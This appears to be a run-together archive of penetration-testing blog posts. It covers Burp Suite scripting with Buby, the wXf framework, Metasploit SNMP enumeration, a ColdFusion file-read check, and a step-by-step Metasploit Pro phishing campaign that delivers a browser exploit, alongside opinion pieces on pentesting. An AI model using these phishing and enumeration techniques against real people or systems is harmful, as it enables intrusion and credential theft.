Dudes, two other fellows and I dealt with an incident in which a victim's online banking account was compromised and a huge lump sum of money was transferred out to Eastern Europe. The victim was still using an old two-factor authentication token, meaning there is no way to tell whether a generated passcode authorizes a login, a money transfer to a specific account, a bill payment, etc.; the attacker manipulates exactly this. Please download it from here: goo.gl/FVFBO Enjoy it, mate ;-)

I've created a video on how to use the latest module addition to the buby family of modules in wXf. The purpose behind the module is to search Burp's history and seek out parameters in requests to an application which match our list of keywords. The keywords are basically parameters that might warrant manual analysis.

Consider we've made the following requests:

http://www.example.com/welcome.php

http://www.example.com/resource.php?accountid=

http://www.example.com/help.php?page=1

Most folks would agree that the request with an accountid parameter warrants some manual analysis. On a larger scale (think thousands of requests), it can be tedious to search these out and then send them to Intruder or Repeater. So the idea is that we have a keyword list to help speed things up: when a match is found, an alert is sent to Burp and the request is sent over to Repeater and Intruder for manual analysis.
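The matching idea can be sketched in plain Ruby, outside of Burp/wXf. The keyword list below is a small made-up sample, not the module's actual list; the real module works against Burp's history rather than bare URL strings.

```ruby
require 'uri'

# Hypothetical keyword list: parameter names that usually deserve
# manual analysis when they show up in a request.
KEYWORDS = %w[account accountid id user file page redirect url]

# Return the parameter names in a URL's query string that match
# (contain) one of our keywords.
def interesting_params(url)
  query = URI(url).query or return []
  names = URI.decode_www_form(query).map { |k, _| k.downcase }
  names.select { |n| KEYWORDS.any? { |kw| n.include?(kw) } }
end
```

In the real module, a hit would trigger issueAlert plus sendToRepeater/sendToIntruder instead of just returning the names.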

As of now the keyword list in wXf isn't huge but I plan on adding to it over the next few days. If you'd like to utilize GitHub's fork/edit/merge function to contribute interesting parameter names please fork the following file.

If you have a personal keyword list that you'd like to use privately that is okay too. The video shows you how to add a file under the datum directory and reload the list of "lfiles" (files under the datum directory).

Don't forget that if you have questions on usage, installation, or anything else, we've provided documentation here.

Hopefully being back on blogger will allow for more and better discussions than on the drupal site and if the blind elephant guy is working on an update, hopefully this fucks up his talk and he doesn't get to call us out this year b/c Drupal sucks to update/manage.

For those of you who have been following the Buby Script Basics of this blog, I hope you'll apply that knowledge to creating a module in wXf. This is a great way for us to share our individual scripts in a way that allows them to be customized on the fly (because the console can set options like the rhost, rport, content to extract, etc.)

Anyway, hopefully this new feature of the framework can continue to grow and become a more powerful feature.

In this portion of the Buby Script Basics series (Part 6), we cover the sendToSpider and makeHttpRequest methods. As always, you can find sample scripts for all of the code in this series under the examples directory of the buby-script repo located Here. The script make_http_request.rb (under the examples directory) will be used to demonstrate makeHttpRequest and sendToSpider.

$burp.get method
=============

Line 24 - We define the method ($burp.get), which takes a url value
Lines 25-27 - If the url is NOT in scope, we send it to the spider function
Line 28 - We use a regexp to extract the path of the url
Line 29 - We instantiate an object called 'path' which is the same as path_match
Line 30 - An object called prefix is instantiated; this is where we extract http:// or https://
Line 31 - uri is basically the url minus the prefix (http:// or https://)
Line 32 - Prior to removing a port (such as url:9000), we extract either an IP or hostname
Line 33 - Same deal for the port: prior to removing the colon, we create a presub_port object which is the colon + port number
Line 34 - The port object is created; this is presub_port cast to String type with the colon removed
Line 35 - The pre object equals true or false depending on whether the prefix is http or https
Line 36 - rpath (remote path) is the path object; if no path was specified it defaults to '/'
Line 37 - host is cast to a String type and the presub_port and rpath values are stripped (giving us the true host value)
Line 38 - The req_str object is the value of get_req (the method we discuss below)
Line 39 - The res object is instantiated; it is the value of the response when the makeHttpRequest call is made. 'res' will be a String type
Line 40 - We print 'res' to the console
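The URL tear-down described above can be sketched in plain Ruby, outside of Buby. The regexes and defaults here are my own approximations of what the walkthrough describes, not the script's actual code.

```ruby
# Rough sketch of the URL tear-down in $burp.get: split a URL into
# prefix, host, port, and path, defaulting path to '/' and the port
# to 80/443 based on the scheme.
def tear_down(url)
  prefix   = url[%r{\Ahttps?://}]           # "http://" or "https://"
  rest     = url.sub(%r{\Ahttps?://}, '')   # host[:port][/path]
  path     = rest[%r{/.*}] || '/'           # default path to "/"
  hostport = rest.sub(%r{/.*}, '')
  host, port = hostport.split(':')
  port ||= prefix == 'https://' ? '443' : '80'
  { prefix: prefix, host: host, port: port, path: path }
end
```

The pieces returned here map onto the prefix, host, port, and rpath objects the walkthrough builds before handing everything to get_req and makeHttpRequest.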

get_req method
============

Line 10 - The method get_req is defined, takes three parameters. Host, Port and Path values.

Line 11 - 'str' object is created and cast as a String type.

The important lines here are 12, 13 and 20.

Line 12 - We take the path value and insert it into the first line of the request string.

Line 13 - host and port are concatenated so that www.example.com and 80 become one string value (www.example.com:80)

Line 20 - Notice how we append two newline characters ("\n\n") versus only one newline character like the rest of the string lines. This is important because Burp will error out and fail to send the request if it is missing. This is how Burp differentiates the headers and body; even if the body is missing, Burp still needs the marker (two newlines) to mark the end of the headers section and understand the request.

That is it. Go ahead and try the script out, and when you run it make sure you choose the -i (interactive) option. Example:

$ jruby -S buby -i -B burp_pro.jar -r make_http_req.rb

At the console, to run this method, you can type the following (examples):

$burp.get('http://www.example.com')
$burp.get('http://www.example.com:9050')
$burp.get('http://www.test.com:3333/test/test.aspx?error=error.jpg')
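Since get_req itself isn't shown above, here is a hedged sketch of what a builder like it produces. The header set is a guess for illustration; the part the walkthrough insists on is the double newline terminating the headers.

```ruby
# Sketch of a get_req-style raw request builder. Note the two
# newlines at the end -- per the walkthrough, Burp needs that marker
# to find the end of the headers even when there is no body.
def get_req(host, port, path)
  str  = "GET #{path} HTTP/1.1\n"
  str << "Host: #{host}:#{port}\n"
  str << "User-Agent: Mozilla/5.0\n"
  str << "Accept: */*\n\n"   # two newlines terminate the headers
  str
end
```

The returned string is what would be handed to makeHttpRequest as req_str.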

In this portion of the Buby Script Basics series (Part 5), we will cover all but two of the remaining methods (methods without lines through them) on our checklist.

As always, you can find sample scripts for each of these under the examples directory of the buby-script repo located Here.

The three methods we will cover are issueAlert, sendToIntruder, and sendToRepeater. The example script is called sendto_and_issue_alert.rb and encompasses all three.

The purpose of this script is to check the body of post messages to see if one of the parameters matches our list of interesting parameters (FUZZ_PARAMS) which deserve manual analysis. We'll perform the manual analysis with intruder/repeater and then issue an alert when the request has been sent over.

Unlike the previous tutorials, this script will be run by invoking the method via the command line.

Example of how to run this script (covered in Part 1 of this series):

$ jruby -S buby -i -B burp_pro.jar -r sendto_and_issue_alert.rb

This script is going to be run against the proxy history; it searches the proxy history looking for interesting requests. After you've interacted with the site, type "$burp.run".

If the parameters in the body of the POST message match our interesting params, you should see the following:

Request sent to repeater, notice the name of the tab (it is our fuzz param "Price")

The request has been sent to intruder

Lastly, an alert will appear notifying you that the previously mentioned actions have been taken.

Time to discuss the code that does all this :-)

First we establish parameters that could be interesting to us in terms of performing manual analysis. The '$burp.run' method is the catalyst for everything that comes next: when the user types $burp.run at the console they are invoking this method. Line 2 instantiates the proxy_hist object ($burp.get_proxy_history). The fourth line determines if the length is greater than 0; if so, we start iterating through each obj in the get_proxy_history array. Line 7 invokes the hmeth method (passing it the 'obj' object). Line 8 calls extract_str with the result of line 7 (hmeth, which is the HTTP method) and the 'obj' object.

The req_meth method takes the request_headers, takes the first line, and converts it to a string. The '[0..3]' slice extracts the first 4 characters of the first line of the request headers. The method returns this value.

Part 1 of extract_str

The extract_str method is where the FUZZ_PARAMS are searched against the request message and sent to Repeater/Intruder (along with the alert). The second line splits objs into the http_meth and req objects. The third line ensures that we do not execute any further code unless http_meth is a POST method. Then we instantiate the bparams object as a Hash on line 4. On line 5, the request_body gets split by the ampersand, breaking up all the params and their values into key/value pairs (ex: Price=2099.00). Next, we split these pairs up by the '=' (equal sign) and place each param/value (key/value) into the bparams hash. Conceptually the bparams hash would look like:

bparams = {'Price' => '2099.00'}

The last line assigns either true or false to the proto object based on whether or not the protocol is https.

Part 2 of extract_str

Here we begin iterating through each item in the FUZZ_PARAMS array. If the bparams hash has a key which matches one of the items in FUZZ_PARAMS, we send it to Intruder/Repeater and issue our alerts.

Explanation of methods:
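The body-splitting portion of extract_str can be sketched in plain Ruby. The FUZZ_PARAMS list below is a made-up sample; the real list lives in the script, and the real method goes on to call sendToIntruder/sendToRepeater on a hit rather than returning the matches.

```ruby
# Hypothetical fuzz list -- parameter names worth manual analysis.
FUZZ_PARAMS = %w[Price price admin role debug token]

# Sketch of the extract_str idea: split a POST body on '&', then on
# '=', build the bparams hash, and report which keys are on the list.
def fuzzable_params(body)
  bparams = {}
  body.split('&').each do |pair|
    k, v = pair.split('=', 2)
    bparams[k] = v
  end
  bparams.keys & FUZZ_PARAMS
end
```

For the example body Item=Laptop&Price=2099.00&Qty=1, only Price survives the intersection, which is the request you'd see land in Repeater and Intruder.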

The code here is nothing more than two arrays. The first array, EXCLUSION_LIST, contains items we'd like to exclude from scope. The second array, INCLUSION_LIST, contains items to include.

The following portion of code contains a PREFIX array (both http and https). While iterating through this prefix array, we iterate through a second list (EXCLUSION_LIST), concatenating the prefix + host + the item in the EXCLUSION_LIST. This step is repeated for the INCLUSION_LIST. The $burp.includeInScope() method is called and we submit the concatenated value (url) to it.
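The nested iteration can be sketched as follows. The list entries are made up for illustration; the real script feeds each built URL into $burp.includeInScope() (or the exclusion equivalent) instead of collecting them.

```ruby
PREFIXES       = %w[http:// https://]
EXCLUSION_LIST = %w[/logout /admin]   # hypothetical entries
INCLUSION_LIST = %w[/app /api]        # hypothetical entries

# Build the full URLs that would be handed to includeInScope /
# excludeFromScope for a given host: every prefix x every path.
def scope_urls(host, paths)
  PREFIXES.flat_map { |pre| paths.map { |p| pre + host + p } }
end
```

Running scope_urls against the INCLUSION_LIST yields both the http and https variants of each path, which is exactly why the prefix loop exists.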

do_active_scan, do_passive_scan, isInScope

----------------------------------------------------

The def $burp.evt_proxy_message is a familiar one at this point in the series, so we won't discuss it in detail. The code @@msg = nil exists solely to instantiate a class-level variable called @@msg. We need to keep an object associated with the request message (headers/body) because passive scanning requires both a request message and a response message.

pre = is_https ? 'https' : 'http' is just a way to define the "pre" object based on whether it is an http or https message.

pre_bool does the same thing as the pre object but instead of http/https it is a true/false.

uri = "#{pre}://#{rhost}:#{rport}#{url}" is just the url (string concatenation).

The last three lines of code here basically set the @@msg value. We only want to do this when it is a request. Remember, we need an object to hold the request message so that even when the current message is a response we can reference both the request message and the response message.

The next bit of code basically says: if this message is in scope AND is a request message, perform an active scan. Otherwise, if it is a message which is in scope but is a response message, perform passive scanning.

So let's cover each individually with a brief explanation and a code example. You can find sample scripts for each of these under the examples directory of the buby-script repo located Here.

EVT_HTTP_MESSAGE
---------------------------------

The following code will allow you to obtain methods exposed by the message_info object (which is a class):

The 3 separate objects that make up the param are:

tool_name => This is a string value, it is the name of the tool for which the message originated. Examples include proxy, scanner and repeater.

is_request => Boolean value (true/false), this returns true when it is a request and false when a response.

message_info => This is a class. It is an instance of the IHttpRequestResponse Java class. So there are methods such as get_comment, set_comment and getUrl exposed.

An example of using evt_http_message can be seen here (code):

....and the result: w00t!

So what does the code actually do?

Lines 1 and 2 - Define the method and separate param into 3 separate objects.
Lines 3-5:
Ln 3 - If the tool the message originated from was the spider and this is NOT a request, proceed to Ln 4.
Ln 4 - If the response status code is 200 (OK), then move to Ln 5.
Ln 5 - Puts "Yo, we received a 200 FTW!" to the console.
Lines 6-9 - Closing statements/method, passing the param back up to the superclass method.

You can find another example using this method in the zlib_inflate.rb script.

EVT_SCAN_ISSUE
---------------------------

The following code will allow you to obtain methods exposed by the issue object (which is a class):

Only one object is exposed; it is a class called issue. Some of the methods exposed by this class are:

Lines 1-2 - Defines the method (prnt) and separates objs into two objects (strn, meth).
Lines 3-4 - Defines a string instance variable (str), then puts the strn object onto it.
Lines 6-10 - We take the meth object, which is an Array, iterate through each item in it, and convert each to a string while calling the four methods it exposes (request_headers, request_body, response_headers, and response_body). These methods all belong to http_messages, and itm really represents the http_messages class. So when we iterate through this array, we are really iterating through an array containing a bunch of http_messages classes. Hopefully that makes sense.

Line 1 - Defines the method ($burp.evt_scan_issue) and instantiates the "issue" object.

Lines 2-14 - Creates an Array called "meth_array" which consists of methods associated with the issue object instantiated on line 1.

Lines 16-18 - Iterates through the meth_array we created on line 2, picking out each method, and then sends the method name and the method itself to prnt.

Line 20 - The http_message method attached to the issue object isn't in meth_array because it can't be called directly and converted to a string. This is because http_message is an array of classes, each with its own methods. So we made a special prnt method for it called hm_prnt.

Well, that is all for Part 3 of this series. Part 4 will cover some of the other methods listed in the first part of this post. If you have any feedback, please provide it so that the series can be improved upon.

Happy Hacking,

I got involved with HDM, skape, spoonm, et al. and the metasploit project quite a long time ago, probably around the msf 1.x time frame. It was an exciting time, and metasploit was one of the best open source infosec projects out there (if not the best). We gave talks, released tools, and HDM and I taught the Tactical Exploitation training course for several years. Core Impact and Canvas were lurking around and constantly growing in capability as well.

Let's cover one of the most used methods (in my opinion/experience) exposed by buby, called "evt_proxy_message". I'd like to cover some of the objects exposed by this method, and the best way to do that is to step through the cookie_snatch.rb script located Here.

On the second line you see that we convert *param into 12 separate objects. Here is a brief explanation of each:

msg_ref - The request/response number. It is nothing more than a tracking number.
is_req - A boolean value, returns either true or false. If it is a request, this returns true; otherwise, false.
rhost - Your target's hostname ONLY. It does NOT include the prefix (http/s), rport (80/443), or path (/directory/something.php).
rport - The remote port value (80/443/etc).
is_https - Returns true when https and false when http.
http_meth - The method (GET/POST/etc).
url - The path portion of a URL, not the full URL itself. Example: if the target was http://www.target.com/mydir/test.aspx then url would be /mydir/test.aspx.
resourceType - The filetype of the requested resource, or nil if the resource has no filetype.
status - The HTTP status code returned by the server. This value is nil for request messages.
req_content_type - String value, the content-type header returned by the server (nil for requests).
message - String value, the entire message, regardless of request/response; contains headers and body.
action - There are 4 types of actions:
ACTION_FOLLOW_RULES (0, this is the default)
ACTION_DO_INTERCEPT (1, direction to intercept a msg)
ACTION_DONT_INTERCEPT (2, don't intercept the msg)
ACTION_DROP (3, drops the in/outbound msg)

Example of using action (folks seem to have some confusion at times regarding this):

if rhost == "www.example.com"
  action[0] = 2
end

The logic of the above code: if the rhost value is www.example.com, then don't intercept. The full code can be found in dont_intercept.rb in the Buby-Scripts repo.

Back to the code:

Lines 3-5:
Ln 3 assigns cookiez.txt to 'file'.
Ln 4 evaluates the boolean value behind is_https. If it is true then prefix = https://, and if false, http://.
Ln 5 creates a rurl object, a string concatenation of prefix, rhost, and rport.

Lines 6-9:
Ln 6 evaluates whether is_req equals false (meaning it is a response). Unless it is a response, the code following it won't run.
Ln 7 spmsg (split message) is the message string split by two newlines. This separates the headers from the body: array item 0 of spmsg (spmsg[0]) will be the headers and spmsg[1] will be the body.
Ln 8 short_msg is assigned spmsg[0], converted to a string.
Ln 9 assigns mitem the Set-Cookie portion of the response header.

Lines 10-12:
Ln 10 uses the in_scope? method, which takes the full URL. This is the reason for creating the rurl object on line 5. If the response is from a site that is in scope, we evaluate the next 2 lines of code.
Ln 11: if mitem (the Set-Cookie key/value) isn't nil, we evaluate line 12.
Ln 12: open the file (created on line 3 as cookiez.txt) and write to it. Because we have passed "a" instead of "w", the cookies will be appended rather than overwritten.

The rest of the code terminates the "if" statements and sends the params up to the superclass's version of evt_proxy_message. This super(*params) call can be handy when you'd like to modify data prior to its arrival at Burp.

Okay, well, hopefully this was a good start for those interested in extending Burp's capabilities. Part 3 in this series will cover other useful methods exposed by Buby.

~Happy Hacking
cktricky
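As a footnote to the walkthrough above, the header/body split and Set-Cookie grab (Lns 7-9) can be sketched in plain Ruby. This is an approximation of the logic, not the script's actual lines; the regex is my own.

```ruby
# Sketch of the response handling in cookie_snatch.rb: split headers
# from body on the blank line, then pull out the Set-Cookie header.
def set_cookie(message)
  headers = message.split("\n\n", 2)[0]   # spmsg[0] in the walkthrough
  headers[/^Set-Cookie:.*$/]              # nil when no cookie was set
end
```

A non-nil return is what the script appends to cookiez.txt when the response is in scope.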

For those of you who are new to Buby, it is a platform for writing Ruby-based extensions against the Burp Suite API, and I'm going to attempt to cover some of the basics. First let me say thank you to Tebo for providing his insight; Tebo is the author of the Buby.kicks_ass => true article. Additionally, thank you to Eric Monti, the creator of Buby. Buby's homepage is located Here.

Installing:

Although you can write Ruby code, this is a JRuby Gem. What does this mean? It means that the code execution environment is JRuby (Java+Ruby) and the Gem should be installed in the JRuby environment.

Let's install JRuby first:

Next, install the Buby Gem.

Basic example of running a script:

The options you see explained

jruby -S buby => runs the jruby environment leveraging the buby gem

-i => interactive, this means you can interact with Burp from the console.

-B => this is the location of your Burp jar file

-r => The script you'd like to run. This is an easy way to run the buby code you've created.

Finally, an example of sending a command to burp via the -i (interactive option). Here we produce an alert "Hello World".

Pre-command

Command

Post Command

Okay so that wraps up Part 1 of Buby Basics.

If you'd like some scripts to mess around before Part 2, you can find some scripts I put together Here.

#loop through each module in the list
modules.each do |blah|
  self.run_single("use #{blah}")
  puts("\nRunning Auxiliary Module #{blah}")
  #for each host with 443 open, set appropriate configs and run the module against it
  hosts.each do |rhost|
    self.run_single("set RHOSTS #{rhost}")
    self.run_single("set RPORT 443")  #change to the port above
    self.run_single("set SSL TRUE")
    self.run_single("run")
  end
end

-a            Search for a list of addresses
-c            Only show the given columns
-h, --help    Show this help information
-n            Search for a list of service names
-p            Search for a list of ports
-r            Only show [tcp|udp] services
-u, --up      Only show services which are up
-o            Send output to a file in csv format
-R, --rhosts  Set RHOSTS from the results of the search

So I’m listening to the “Larry, Larry, Larry” episode of the Risk Hose podcast, and Alex is talking about data-driven pen tests. I want to posit that pen tests are already empirical. Pen testers know what techniques work for them, and start with those techniques.

What we could use are data-driven pen test reports. “We tried X, which works in 78% of attempts, and it failed.”

We could also use more shared data about what tests tend to work.

Thoughts?

Dre's response to the post was surprising to me; he listed a bunch of tools that seem to correlate pentest results into a portal so you can trend over time. Cool idea, I'll give people that. But to me, when we start jumping into repeatable, metrics-driven stuff, we are in vulnerability assessment land, not pentesting land. Here is the comment I left:

I like the idea and i think it could be useful.

However, they need to drop the pentest part. you are solidly into the vulnerability assessment part of things when you are talking about “ok, i tried 1,2,3,4,5 and 1 & 3 worked” ok on to the next set of tests… thats vulnerability assessment (with exploitation if you want to get technical) and not pentesting.

pentesting is about that human looking at the problem and figuring out how to break it, not some scanner, thats going to be very hard to standardize and put hard numbers on and i dont think its going to be possible without tying up your tester’s time with bullshit.

I'm all for "repeatable" pentests. You should have a methodology for each type of test, but when you are paying for a human's time you should be paying for them to go after the site like a human would, not how a scanner would, and not in a way where I'm worried about religiously following some checklist because if I don't the metrics get all fucked up. Your pentest should come after you have thrown the kitchen sink at it scanner-wise. As an added bonus, this post was right below the New School post in my Google Reader: http://coding-insecurity.blogspot.com/2011/04/developing-good-methodology-part-3.html

This post and really any methodology document you will ever read or write will have gaps, because no document on this subject can ever really be 100% all inclusive of every vulnerability and the myriad of variations that exist for many of these.

my new favorite modules (for today) are the snmp_enumusers and snmp_enumshares modules that work against windows hosts that have snmp running.

msf > use auxiliary/scanner/snmp/
use auxiliary/scanner/snmp/aix_version
use auxiliary/scanner/snmp/snmp_enumshares
use auxiliary/scanner/snmp/cisco_config_tftp
use auxiliary/scanner/snmp/snmp_enumusers
use auxiliary/scanner/snmp/cisco_upload_file
use auxiliary/scanner/snmp/snmp_login
use auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/snmp/snmp_set

msf auxiliary(snmp_login) > use auxiliary/scanner/snmp/snmp_enumusers
msf auxiliary(snmp_enumusers) > info

...SNIP...

Description:
  This module will use LanManager OID values to enumerate local user accounts on a Windows system via SNMP

Another research fellow, AlanH0, and I carried out basic web vulnerability digging against over 80 companies in Hong Kong, including government, banks, and listed companies. We wanted to see whether they had done their webapp security "homework" since 2004 (i.e. when the OWASP Top 10 vulnerabilities were published). Amazingly, we found over 120 basic vulnerabilities across 90 organizations.

Did they still stay in the stone age, simply trusting the scanner's "no risk" result and feeling secure and safe afterwards?
Did they get the right party for the penetration test?
Did they still believe that only a CISSP could be the penetration tester?
Did they adopt any secure software and system development lifecycle?
Did their developers get training regularly?

Penetration testing often focuses on individual vulnerabilities and services, but the quickest ways to exploit are often hands on and brute force. This two-day course introduces a tactical approach that does not rely on exploiting known vulnerabilities. Using a combination of new tools and lesser-known techniques, attendees will learn how hackers compromise systems without depending on standard exploits. The class alternates between lectures and hands-on testing, providing attendees with an opportunity to try the techniques discussed. A virtual target network will be provided, along with all of the software needed to participate in the labs.

Today we've released the beta version (rough, rough version) of wXf by making the repository public. Over the last year we've worked on this code in an "on again, off again" fashion. Since we started the project we've learned a lot. I know I've personally learned a ton about Ruby and metaprogramming (check out Paolo Perrotta's book if you get a chance). We've rewritten the code several times, but we've reached the point where it is at least stable enough to release. Now others have the chance to improve on it.

We've gotten loads of feedback from the beta group (consisting of a few volunteers) which has helped us tremendously with some of the usability and documentation. Additionally, we've started to gauge what people do and do not want to see. We know that the AppSec community doesn't want another point and click tool and certainly doesn't need another scanner.

The biggest question posed to us over the last 11 months was "Why not merge with (insert framework here)". The answer is actually incredibly simple and is the basis for why we created the software. We'd like the community of testers/consultants/developers/etc to decide what they want to see most.

To have the ability to adapt an entire framework to the user base and change it as needed is only feasible if we a) have total flexibility in modifying ANY portion of the code and b) aren't pigeonholed into just one area of focus (exploitation, scanning).

Whether it be source code review, exploitation, enumeration, fuzzing modules, phishing, mobile appsec, or whatever else... we'd like to glue together some of the ideas and scripts of the community at large. So please contribute. Submit bugs, provide feedback, help with the wiki, or develop modules. Every little bit counts.

As an update, wXf is almost ready to move forward with its first release. Hopefully the software is what folks expected, as we are still learning from and adapting to the beta group's feedback.

In the meantime, if you couldn't attend AppSec DC 2010, here is the video of the presentation Chris Gates, Seth Law and I put together. Unfortunately Seth Law could not make it due to a prior engagement but nevertheless contributed to the content.

Make sure to check out all of the great presentations that AppSec DC had under the asdc10 group on vimeo. Doug Wilson and Mark Bristow did a fantastic job organizing this conference and my hat goes off to them.

The problem with pentesters phishing ... is that it does more harm than good for the organization. Without the education piece following a phish, you set up the organization to ban the practice."

Phishing and client-side attacks have been going on for far too long not to allow your testers to use them during a test.**

So on one hand you are correct: every phishing exercise done by an internal team, pentester, or attacker should be followed by an education piece from your internal security/IT team. Every phishing attack is an opportunity to retrain users.

On the other hand, it's how people get in. Broadly calling it useless because 1) you are too lazy to educate your users after the fact or 2) you didn't think ahead enough to require the PT shop to leave you with education materials or to follow up the phish with an education piece doesn't mean it lacks value.

Like I mentioned in the previous post, you need to know how you are going to stand up in realistic scenarios. Does one client-side 0day leave your whole network open to all sorts of badness? You need to know.

**This is assuming that the company's maturity level supports doing a phishing exercise. If your internal security just plain sucks, then you could probably win the argument that no phishing should be conducted, but I would counter with: why are you getting a pentest in the first place if things are that bad? Use those consulting dollars to have the consultant help you with your risk plan, internal vulnerability scanning/patching program, or workstation/server hardening, or teach you how to scan your internal assets yourself. To steal a Nickerson analogy... "how do you know you can put up a fight if you can't take a punch?" BUT that doesn't mean you start out getting your ass kicked by training with [INSERT MMA BADASS HERE] instead of working your way up.

Everyone should check out the slides and the whitepaper, although the slides are better with the case studies and the diagrams. When you check out the slides I encourage you to think about your last pentest and:

1. Could your pentest shop emulate an attacker of the level in the case studies?
2. Did you or they try to scope the test in order to test things like this... aka do a Full Scope test?
3. If you aren't letting your pentesters go after your network like this, how do you think YOUR network will hold up against someone that knows what they are doing?

If you ARE a pentester, when was the last time you got the time and scope to do something on the order of the attacks and post-exploitation activities from the case studies?

We are getting great at catching our penetration testers (video) but still horrible at catching bad guys. Rather than draining your corporate bank account to have some shop come in and help you clean up your mess after you've discovered someone stealing everything you own: 1. pick a Full Scope shop that can emulate advanced attackers and not just script kiddies with a checkbook, and 2. train like you fight: open the scope for your test, give your testers time to conduct a REAL test, and let your pentesters go after it like a real bad guy would.

Instead of making your testers "test" that same 500 hosts out of 10,000 hosts with no client-sides or user interaction allowed... ask (make, force) them to conduct an end-to-end test of the expensive black boxes you have sitting in the rack, your user education, your network segmentation, and your NOC/SOC's ability to detect and respond to attacks. Better to find out you suck during your test instead of when someone is stealing everything that makes you money.

Yesterday I made a tweet stating that pen testing and pen testers are obsolete. Here's what I mean by that.

Originally, pen testing was a simulation of what real attackers would do. Then it became more about validating vuln scan/assessment results. Now it's essentially about compliance check-boxing (PCI).

Vulnerability assessment pretty much no longer requires a skilled tester. There are now (and have been for a while) appliances and products which can schedule and automate vulnerability scans. At this point it is essentially a component of patch management. As vuln scanning has gone, so will pen testing go.

So the new job gets me new fun toys. Figured I'd try the fancy shmancy tools and do a phish campaign with Metasploit Pro.

1. Go click on Campaigns and start filling stuff out, like what you want to call it

2. Set up your web campaign. With the web campaign you can actually host a webpage along with your exploit instead of just getting the typical "please wait" stuff.

3. Fill out the name of the template and the HTML of what you want it to say

4. By default it will run browser autopwn

5. Let's just pick an exploit to throw at them instead of all of them

6. Once you click save, it should look something like this:

7. After that you can set up the email portion of the phish

8. Fill out the sending server options

9. Then fill out the text for the body of your email

10. After you click save, you'll go to the add email addresses section where you can import a list, or type them in

11. It kinda looks like this when it's all filled out. To start, click the Start Campaign button

12. You can see the status of your sent emails and as people click them the percentage will change

13. I guess this is what the email could look like if you weren't trying too hard :-)

14. And the web page serving up the exploit

15. You can now see that a user clicked the link and our percentage has changed

I'll cover hosts and sessions later. My only gripe is the lack of configuration ability in the exploit/payload section. I've been told this will be addressed shortly; even though a lot of work has been put into smart defaults, the ability to change them when necessary would be nice.

Anyway, it's a cool bug:

1. It affects several products, although most people have probably never heard of any of them except ColdFusion.
2. It's enabled by default on all those products you've never heard of; ColdFusion is the exception, although CF 8 appears to have it turned on by default as well.
3. You have to apply patches for CF individually and there is no automated process. Since this vuln got little media attention, I've seen a lot of hosts that are still missing this patch and/or didn't turn off the vulnerable service.

On with the demo!

So against a patched host, or someone that has disabled the service in ColdFusion, you'll see one of two things: either 404's for the checks, or a 200 for /flex2gateway/ and a 500 for the http or https check.

If you get a bunch of 400's then you need to set the VHOST. When it works, you'll see something like this for /etc/passwd:

and like this when you ask for a file that doesn't exist or that CF doesn't have permission to read (since CF doesn't run as root on Linux, requesting /etc/shadow won't work) :-(

At this point you're probably like "so what?" Well, what's cool about an arbitrary file read is that 1. it also works on Windows:
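The response-code triage described above can be sketched as a small helper. This is purely illustrative: `classify_cf_check` is my own name, and the `/flex2gateway/http` path for the http check is an assumption on my part; the interpretation of the codes follows the behavior described in the post.

```python
# Rough triage of the flex2gateway checks based on the response codes
# described above: 400s mean set VHOST, 404s (or 200 on /flex2gateway/
# with 500 on the http check) mean patched/disabled.

def classify_cf_check(statuses):
    """statuses: dict mapping check path -> HTTP status code."""
    codes = list(statuses.values())
    # A pile of 400s usually means the server wants a Host header.
    if codes and all(c == 400 for c in codes):
        return "set VHOST and retry"
    # All 404s: the service is disabled or the host is patched.
    if codes and all(c == 404 for c in codes):
        return "patched or service disabled"
    # 200 on /flex2gateway/ but 500 on the http check: also patched.
    if (statuses.get("/flex2gateway/") == 200
            and statuses.get("/flex2gateway/http") == 500):
        return "patched or service disabled"
    if statuses.get("/flex2gateway/") == 200:
        return "worth a closer look"
    return "inconclusive"

print(classify_cf_check({"/flex2gateway/": 200, "/flex2gateway/http": 500}))
```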

In part I agree: you are never going to "win" by keeping an attacker out. As he puts it in the post:

Traditionally we've held the mindset that we "win" if we stop the attackers. This mindset is sheer folly. To "win" in this scenario we need to successfully defend against 100% of attacks, whereas the attacker need only succeed once (probabilistically this works out to being far less than 100%).

Instead, we need to acknowledge the nature of our asymmetric threat and realize that there is no way to achieve "perfect" security and resist 100% of attacks. To think otherwise is willfully ignorant. Instead, we must accept a new status quo based on survivability. That is, despite successful attacks, we can consider ourselves victorious in conflict merely by surviving.

Protecting YOUR important data on the network is ultimately the goal of most network security. Keeping the attackers out entirely is a silly goal. You are one Adobe/Flash/Java/whatever 0day away from failing to keep attackers out and thus "losing".

Surviving a network attack is not the same as surviving a mortar attack on a FOB, where if I'm still breathing and have use of my limbs at the end of it I can call that a "win". In turn, it's not a successful penetration test or attack if I merely "get in" and pop a bunch of shells (see Chris Nickerson's Top 5 Ways To Destroy A Company talk). It's a "win" when I steal what makes that company money, extract it without them knowing, then show it to them later for the "poop in the pants" moment. A report with a bunch of screenies of shells doesn't convey the same sense of "oh shit" that the first 100 entries of their key database does. In this case, while the business may have thought they "survived", they in fact "lost".

We're getting really good at teaching our clients how to catch penetration testers and their methodologies, and conditioning them that this is a "win", when in fact most times defenders fail to see and catch people with a modified methodology, non-public tools, or "non-standard" goals.

First Impressions...skinny book. Strike One. Chapter 1 -- "Intelligence Gathering: Peering Through the Windows to Your Organization" spends a lot of time on physical security and social engineering and no mention of Maltego. I'm not sure how anyone can write a book on Intelligence Gathering and NOT include Maltego. Strike Two.

At this point I was thinking I had a dud on my hands, BUT Chapter 2 -- "Inside-Out Attacks: The Attacker Is the Insider" redeems it. Tons of code and examples to make XSS work in "realistic" scenarios mix the right amount of tech and narrative. My only gripe was that they talked about using XSS Shell for XSS exploitation instead of BeEF, which is actively maintained and developed.

All the other chapters (except for Chapter 3) were very good; none of the others are as technical as Chapter 2, but I believe they cover the current trends in an entertaining and readable way. Like one reviewer mentioned, the information covered in Chapter 5 -- "Cloud Insecurity: Sharing the Cloud with Your Enemy" was not what I expected. It covered high-level "possible" attacks versus any "probable" attacks, with the possible exception of making insecure VMs and getting people to run them. Chapter 7 -- "Infiltrating the Phishing Underground: Learning from Online Criminals?" was a "chapterfied" version of the authors' talk on the subject. Chapter 4 -- "Blended Threats: When Applications Exploit Each Other" was a good overview of stringing together vulnerabilities that would be/were not considered high risk into high-risk issues by combining one or more together, which actually is "next generation".

Grabbing the index pages of web servers seems like a no-brainer and something every pentester is going to perform on a test. The problem I ran into is: how do you get this info once you're inside and using meterpreter as your pivot into the network?

Your current options are to port forward to each host or to set up a route via your meterpreter session and run some sort of auxiliary module. You can TCP port scan and find open ports, or use the http_version module to see the server version, but you don't get a feel for what's actually on the site.

